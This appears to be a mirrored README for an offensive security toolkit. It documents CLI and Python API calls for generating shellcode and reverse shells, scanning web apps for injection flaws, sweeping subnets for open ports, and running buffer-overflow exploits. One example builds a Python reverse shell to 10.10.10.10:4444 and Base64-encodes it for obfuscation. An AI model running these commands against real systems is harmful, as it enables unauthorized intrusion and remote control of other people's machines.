Share
## https://sploitus.com/exploit?id=377F6548-C31D-529F-80FB-2A317F03E7CC
# Exploit Framework

[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
[![Python 3.8+](https://img.shields.io/badge/python-3.8+-blue.svg)](https://www.python.org/downloads/)
[![Version](https://img.shields.io/badge/version-1.0.0-red.svg)]()

**Owner**: Nithish K (infonity404@gmail.com)  
**Alias**: ShadowInfinitywarrior

A high-performance, modular security research toolkit for penetration testing, vulnerability research, and exploit development. Covers buffer overflows, web application exploits, and network protocol vulnerabilities.

## Table of Contents

- [Features](#features)
- [Installation](#installation)
- [Quick Start](#quick-start)
- [Usage](#usage)
  - [Payload Generator](#payload-generator)
  - [Web Exploits](#web-exploits)
  - [Binary Exploits](#binary-exploits)
  - [Network Exploits](#network-exploits)
  - [Encoders](#encoders)
- [CLI Reference](#cli-reference)
- [API Reference](#api-reference)
- [Examples](#examples)
- [Contributing](#contributing)
- [Legal Disclaimer](#legal-disclaimer)
- [Author](#author)

## Features

### Payload Generator
- Multi-architecture shellcode (Linux x86/x64, Windows x86/x64)
- Reverse shells (bash, nc, python, perl, ruby, java)
- Bind shells with multiple protocols
- ROP chains and egghunter shellcode
- NOP sled generation with customizable length
- Meterpreter payload templates

### Web Exploits
- SQL Injection scanner with error-based detection
- Cross-Site Scripting (XSS) scanner
- Local File Inclusion (LFI) scanner
- Remote File Inclusion (RFI) detection
- Command injection exploitation
- Server-Side Request Forgery (SSRF) scanner
- Open redirect finder
- CSRF token audit

### Binary Exploits
- ELF binary analysis (PIE, NX, Canary, RELRO)
- ROP gadget finder
- Buffer overflow pattern generation
- Ret2libc exploitation chain
- Process interaction utilities

### Network Exploits
- High-performance parallel port scanning (up to 100 threads)
- Service detection and banner grabbing
- TCP/UDP protocol fuzzing
- IP/TCP packet crafting
- ARP scanning for local network discovery
- Stealth SYN scanning

### Encoders
- Base64/Base32 encoding/decoding
- XOR encoder with customizable key
- URL encoding/decoding
- Hex encoding/decoding
- Rot13 cipher
- Caesar cipher with shift
- AES encryption

## Installation

```bash
# Clone the repository
git clone https://github.com/ShadowInfinitywarrior/exploit-framework.git
cd exploit-framework

# Install dependencies
pip install -r requirements.txt

# Or install as package
pip install -e .
```

### Requirements
- Python 3.8+
- requests
- pwntools
- scapy
- pycryptodome

## Quick Start

```python
from payloads import PayloadGenerator
from exploits.web import WebExploits
from exploits.network import NetworkExploits
from payloads.encoders import Base64Encoder

# Generate shellcode
gen = PayloadGenerator()
shellcode = gen.generate_shellcode('linux_x64')

# Web scanning
web = WebExploits(timeout=5)
vulns = web.sqli_scan('http://target.com/search', {'q': 'test'})

# Port scanning
net = NetworkExploits(threads=200, timeout=2)
open_ports = net.port_scan('192.168.1.1', [22, 80, 443, 8080])
```

## CLI Reference

### Payload Module
```bash
python main.py payload --shellcode linux_x64
python main.py payload --reverse-shell 127.0.0.1 4444 --reverse-shell-fmt python
python main.py payload --python-rev 127.0.0.1 4444
python main.py payload --php-rev 127.0.0.1 4444
python main.py payload --nop-sled 200
python main.py payload --egghunter --egghunter-tag W00T
```

### Web Exploits Module
```bash
python main.py web sqli --url http://target.com/search --param q
python main.py web xss --url http://target.com/page --param input
python main.py web lfi --url http://target.com/view --param file
python main.py web cmdi --url http://target.com/exec --param cmd
python main.py web ssrf --url http://target.com/fetch --param url
python main.py web redirect --url http://target.com/redirect --param url
```

### Binary Exploits Module
```bash
python main.py binary --pack64 0x401000
python main.py binary --pack32 0x401000
python main.py binary --pattern 5000
```

### Network Exploits Module
```bash
python main.py network --scan 192.168.1.1 --ports 22 80 443
python main.py network --banner 22 --scan 192.168.1.1
python main.py network --syn-scan 192.168.1.1 --ports 80,443
python main.py network --arp-scan
```

### Encode Module
```bash
python main.py encode --base64 "test payload"
python main.py encode --xor "test payload" --xor-key 0xAA
python main.py encode --hex "test payload"
python main.py encode --url "test payload"
```

## API Reference

### PayloadGenerator

```python
gen = PayloadGenerator()

# Shellcode
gen.generate_shellcode(arch='linux_x64')  # Returns bytes
gen.shellcode.keys()  # ['linux_x86', 'linux_x64', 'windows_x86', 'windows_x64']

# Reverse shells
gen.generate_reverse_shell(host, port, proto='tcp', fmt='bash')
gen.generate_python_reverse_shell(host, port)
gen.generate_php_reverse_shell(host, port)

# Helpers
gen.generate_nop_sled(length=100)
gen.generate_egghunter(tag=b'W00T', arch='x86')
gen.pack_ip_port(host, port)
gen.generate_custom(template, **kwargs)
```

### Encoders

```python
from payloads.encoders import Base64Encoder, XOREncoder

b64 = Base64Encoder()
b64.encode(b'data')      # Base64 encode
b64.encode_urlsafe(b'data')  # URL-safe Base64
b64.decode(b'ZGF0YQ==')  # Decode

xor = XOREncoder(key=0xAA)
xor.encode(b'data')  # XOR encode
xor.decode(b'\x9a\x9a')  # XOR decode (same as encode)
```

### WebExploits

```python
web = WebExploits(timeout=5, verify_ssl=False)

web.sqli_scan(url, {param: payload})
web.xss_scan(url, {param: payload})
web.lfi_scan(url, param)
web.command_injection(url, param, command='id')
web.ssrf_scan(url, param)
web.open_redirect(url, param)
web.csrf_audit(url)
web.upload_bypass(url, {'file': fileobj})
```

### BinaryExploits

```python
bin = BinaryExploits(binary_path='./vulnerable_binary')

bin.find_elf_info('./binary')  # Returns dict with arch, bits, canary, nx, pie, relro
bin.create_pattern(1000)
bin.find_gadgets('./binary', 'pop rdi')
bin.pack_64(addr)  # Pack 64-bit address
bin.pack_32(addr)  # Pack 32-bit address
bin.exploit('./binary', payload)
```

### NetworkExploits

```python
net = NetworkExploits(timeout=2.0, threads=100)

# Port scanning
net.port_scan('192.168.1.1', [22, 80, 443])  # [(port, is_open), ...]
net.syn_scan('192.168.1.1', [80, 443])  # Returns open ports list

# Service detection
net.service_detection('192.168.1.1', 22)

# Packet crafting
net.create_ip_packet('127.0.0.1', '192.168.1.1')
net.create_tcp_packet(1234, 80, flags='S')
net.tcp_fuzz('192.168.1.1', 9999, payload)
net.udp_fuzz('192.168.1.1', 9999, payload)
net.arp_scan(interface='eth0', network='192.168.1.0/24')
```

## Examples

### Generate and encode a reverse shell
```python
from payloads import PayloadGenerator
from payloads.encoders import Base64Encoder, XOREncoder

gen = PayloadGenerator()
shell = gen.generate_python_reverse_shell('10.10.10.10', 4444)

# Encode for obfuscation
b64 = Base64Encoder()
encoded = b64.encode(shell.encode())
print(f"Encoded payload: {encoded.decode()}")
```

### Fast network reconnaissance
```python
from exploits.network import NetworkExploits

net = NetworkExploits(threads=200, timeout=1.5)
hosts = ['192.168.1.{}'.format(i) for i in range(1, 255)]

for host in hosts:
    results = net.port_scan(host, [22, 80, 443, 445, 3306, 5432])
    open_ports = [p for p, status in results if status]
    if open_ports:
        service = net.service_detection(host, open_ports[0])
        print(f"{host}: {open_ports} - {service}")
```

### Binary exploitation workflow
```python
from exploits.binary import BinaryExploits

bin = BinaryExploits()
info = bin.find_elf_info('./vulnerable')

if not info['nx'] and not info['canary']:
    # Vulnerable to buffer overflow
    offset = bin.create_pattern(5000)
    payload = offset + bin.pack_64(0x401000)  # ret addr
    bin.exploit('./vulnerable', payload)
```

## Contributing

Contributions welcome! Please:
1. Fork the repository
2. Create a feature branch
3. Submit a pull request

## Legal Disclaimer

This tool is for **authorized security testing only**. Unauthorized use against systems you do not own is illegal. The author assumes no liability for misuse.

## Author

**Nithish K**  
Email: infonity404@gmail.com  
Alias: ShadowInfinitywarrior